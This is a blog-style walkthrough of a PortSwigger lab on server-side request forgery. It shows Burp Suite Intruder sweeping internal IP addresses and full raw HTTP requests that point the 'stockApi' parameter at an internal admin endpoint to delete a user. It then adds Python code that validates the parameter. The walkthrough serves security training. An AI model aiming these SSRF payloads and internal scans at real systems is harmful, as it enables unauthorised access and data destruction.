SSRF Attack With Another Back-End System

Hello Cyberman!
How are you? I hope you are fine.
This article covers the SSRF attack method against another back-end system.
If you don't know what SSRF is, read the earlier post on it first.

Now we will walk through this attack method with a different example.

This method is called "another back-end system". Here is how it works. Above all, we must not forget that SSRF is a server-side attack. In this scenario, the server gets its data from another server.

As seen in the picture above, when the client computer opens the web site, the server computer (for example, IP address 192.168.0.155) serves the web site to the client computer.
When the client computer requests other data, the computer at 192.168.0.155 requests that data from another computer (IP address 192.168.0.200).

These two computers are actually on the same network. When we want to delete data on the computer at 192.168.0.155, we need to find the data source, because the source of the data is the computer at 192.168.0.200.

An example of this scenario is available as a PortSwigger lab. Click the "Access the lab" button to enter the lab, as seen in the picture below.

On the screen that opens, press the "View Details" button on any item. When we click the "Check Stock" button to find out the amount of stock in other branches, it gives us a number.

Now, think differently. If this server receives data from another server, can I retrieve or modify other data on that server? The answer is yes. We need a program to see the packets in the request and response. Its name is Burp Suite. I explained what Burp Suite is in an earlier article.

Now we open Burp Suite. With Intercept on, click the "Check stock" button. The result is as seen in the picture below.

The "stockApi" parameter is now in front of us. We change the IP address in this parameter: we set "stockApi" to "http://192.168.0.1:8080/admin", as seen in the picture below.

Each part of an IP address takes a number from 0 to 255. That is a lot of numbers, and it would not be practical to try them one by one. We use a wonderful feature of Burp Suite: "Intruder".

So, let's send our request to the "Intruder" tab in Burp Suite. To do this, right-click the request and click "Send to Intruder".

As seen in the picture above, Burp Suite will automatically try the green areas for us. First, click the "Clear" button to deselect all areas. Then select only the "1" in the IP address and click the "Add $" button.

Then configure the payload settings as shown in the picture below.

Then click the "Start attack" button. The attack window opens and tries the numbers for us one by one. We are looking for the number 200 in the status column, drawn in yellow in the picture below.

I had to reboot due to a Burp Suite connection problem. Therefore, I got the status code "200" at number "12", as seen in the picture below.

OK, now let's manipulate the request with Burp Suite. I set the "stockApi" parameter to "http://192.168.0.12:8080/admin". Then I send the request by pressing the Forward button.

Then click the "delete" button to delete carlos, and look at the request in Burp Suite.
The result is the text below:

GET /http://192.168.0.12:8080/admin/delete?username=carlos HTTP/1.1
Host: 0a46007d04c3a019c0013fb300950017.web-security-academy.net
Cookie: session=JhMrhAIxOT1zjGN9ad7CNZNgxhkEe8Mj
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

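This GET request goes to the public web site, not to the back-end system, so we take its URL and put it into the "stockApi" parameter of the stock check request, as in the text below: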

POST /product/stock HTTP/1.1
Host: 0a46007d04c3a019c0013fb300950017.web-security-academy.net
Cookie: session=JhMrhAIxOT1zjGN9ad7CNZNgxhkEe8Mj
Content-Length: 96
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a46007d04c3a019c0013fb300950017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

stockApi=http://192.168.0.12:8080/admin/delete?username=carlos

Then we send the request via Burp Suite.

And finally! First we reached the admin panel, then we deleted carlos.
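The lab works because the server fetches whatever URL arrives in "stockApi". The following is an added example, not code from the lab or from this article, of a server-side check that accepts only the expected stock service URL; the host name `stock.internal.example`, port, path and the function name `validate_stock_api` are assumptions, since the page never shows the legitimate value.

```python
from ipaddress import ip_address
from urllib.parse import urlsplit

# Assumed allowlist: the page never shows the legitimate stockApi URL, so this
# scheme/host/port/path is a placeholder for the real stock service.
ALLOWED_ORIGINS = {("http", "stock.internal.example", 8080)}
ALLOWED_PATH = "/product/stock/check"
DEFAULT_PORTS = {"http": 80, "https": 443}


def validate_stock_api(raw_url):
    """Return (ok, reason) for a client-supplied stockApi value."""
    try:
        parts = urlsplit(raw_url.strip())
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in DEFAULT_PORTS:
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"  # blocks allowed-host@other-host
    host = (parts.hostname or "").lower()
    try:
        ip_address(host)
        return False, "IP literal not allowed"
    except ValueError:
        pass  # not an IP literal, so continue with the hostname checks
    if port is None:
        port = DEFAULT_PORTS[parts.scheme]
    if (parts.scheme, host, port) not in ALLOWED_ORIGINS:
        return False, "origin not in allowlist"
    if parts.path != ALLOWED_PATH:  # exact match, so /../ tricks cannot pass
        return False, "path not allowed"
    return True, "ok"


# Constructed samples: the first is a made-up legitimate call, the next two are
# the stockApi values used in the article, the last mixes an allowed host name
# into the userinfo part of the URL.
SAMPLES = [
    "http://stock.internal.example:8080/product/stock/check?productId=2&storeId=1",
    "http://192.168.0.1:8080/admin",
    "http://192.168.0.12:8080/admin/delete?username=carlos",
    "http://stock.internal.example:8080@192.168.0.12:8080/admin",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(validate_stock_api(url), url)
```

A stronger design takes only the product and store IDs from the client and builds the back-end URL on the server, so no URL is accepted at all. Whichever is used, the HTTP client that performs the fetch should not follow redirects.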

Have a nice day with lots of informatics 🙂
